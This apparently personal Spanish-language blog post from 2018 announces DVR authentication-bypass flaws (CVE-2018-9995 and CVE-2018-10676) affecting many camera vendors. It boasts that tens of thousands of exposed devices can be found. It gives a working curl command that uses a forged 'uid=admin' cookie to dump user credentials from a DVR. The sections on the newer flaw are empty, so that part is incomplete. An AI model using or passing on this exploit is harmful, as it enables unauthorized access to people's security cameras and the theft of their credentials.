miércoles, 2 de mayo de 2018

[ 0day ] DVR (#multi)vendor ( CVE-2018-10676 )

Ya estamos al tanto del anterior fallo que atentanta contra miles de DVR, al que le fue asignado el CVE: "CVE-2018-9995".


Fallo involucra a dispositivos de distintos vendors ( TBK Vision, Novo, CeNova, QSee, Pulnix, Securus, Night OWL, etc. )



Para dar con ellos en favor del criterio de búsqueda que apliquemos podemos llegar a mas de 50k promedio de dispositivos:

 
***







Exploit:

Explotar la vulnerabilidad es algo trivial:


 $> curl "http://{dvr_host}:{port}/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"



now, The New vuln:

Mismos dispositivos, nueva alternativa para conseguir las credenciales:


OLD ( 0day ?) : 




New (0day ?):  CVE-2018-10676







Saludos,
@capitan_alfa

No hay comentarios.:

Publicar un comentario